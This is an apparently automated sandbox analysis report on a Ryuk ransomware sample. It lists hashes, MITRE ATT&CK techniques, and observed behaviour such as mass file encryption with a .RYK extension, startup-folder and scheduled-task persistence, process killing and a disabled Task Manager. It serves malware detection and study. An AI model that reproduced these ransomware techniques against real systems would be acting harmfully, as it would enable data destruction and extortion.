Malware Analysis Report

2024-08-06 09:33

Sample ID 230719-rdladshb8x
Target ecd9d8ef99eb98exe_JC.exe
SHA256 fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6
Tags
ryuk discovery evasion ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6

Threat Level: Known bad

The file ecd9d8ef99eb98exe_JC.exe was found to be: Known bad.

Malicious Activity Summary

ryuk discovery evasion ransomware

Ryuk

Renames multiple (60) files with added filename extension

Renames multiple (7863) files with added filename extension

Renames multiple (5399) files with added filename extension

Disables Task Manager via registry modification

Modifies file permissions

Drops startup file

Enumerates connected drives

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Kills process with taskkill

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Views/modifies file attributes

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK Matrix V6

Initial Access
TA0001
Execution
TA0002
Scheduled Task
T1053
Persistence
TA0003
Scheduled Task
T1053
Hidden Files and Directories
T1158
Privilege Escalation
TA0004
Scheduled Task
T1053
Defense Evasion
TA0005
File Permissions Modification
T1222
Hidden Files and Directories
T1158
Credential Access
TA0006
Discovery
TA0007
Query Registry
T1012
Peripheral Device Discovery
T1120
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040

Analysis: static1

Detonation Overview

Reported

2023-07-19 14:04

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-19 14:04

Reported

2023-07-19 14:07

Platform

win7-20230712-en

Max time kernel

150s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe"

Signatures

Ryuk

ransomware ryuk

Renames multiple (5399) files with added filename extension

ransomware

Disables Task Manager via registry modification

evasion

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\attrib.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10253_.GIF.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\St_Johns.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\vlc.mo.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18211_.WMF.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216112.JPG.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Swift_Current.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.servlet_8.1.14.v20131031.jar.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\vlc.mo.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107502.WMF.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Clarity.thmx.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Galapagos.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_zh_CN.jar.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sampler.jar.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ust-Nera.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0301050.WMF.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18215_.WMF.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chihuahua.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bishkek.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\CAPSULES\THMBNAIL.PNG.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\1033\FM20.CHM.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00479_.WMF.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0285926.WMF.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\UseSelect.mhtml.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-enumerations.xml.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\EVRGREEN\EVRGREEN.INF.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0230876.WMF.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Sakhalin.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\STUDIO\STUDIO.ELM.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105332.WMF.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185790.WMF.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00052_.WMF.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiBold.ttf.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-modules.xml.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\server\Xusage.txt.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\imap.jar.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02201_.GIF.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\mng.txt.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunmscapi.jar.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-8.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Noumea.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui_5.5.0.165303.jar.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UTC.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\uninstall.log.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02578_.WMF.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator_1.1.0.v20131217-1203.jar.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\ACEERR.DLL.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\ACEXBE.DLL.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00050_.WMF.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0337280.JPG.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02025_.WMF.[[email protected]].[8F562417].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2660 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2132 wrote to memory of 2136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2132 wrote to memory of 2136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2132 wrote to memory of 2136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2660 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
